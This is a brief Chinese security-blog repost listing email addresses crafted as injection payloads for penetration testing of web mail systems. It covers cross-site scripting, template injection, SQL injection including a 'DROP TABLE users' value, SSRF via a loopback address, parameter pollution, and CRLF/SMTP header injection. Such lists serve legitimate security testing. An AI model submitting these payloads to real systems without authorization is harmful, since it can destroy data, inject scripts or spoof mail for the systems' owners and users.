点击上方蓝字“Ots安全”一起玩耍
以下有效负载都是有效的电子邮件地址,我们不仅可以使用这些地址对基于 Web 的电子邮件系统进行渗透测试。
XSS(跨站脚本):
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
模板注入:
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
SQL注入:
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
SSRF(服务器端请求伪造):
[email protected]
john.doe@[127.0.0.1]
参数污染:
victim&[email protected]
(电子邮件)标头注入:
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>rnRCPT TO:<victim+"@test.com
原文始发于微信公众号(Ots安全):电子邮件地址有效载荷
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论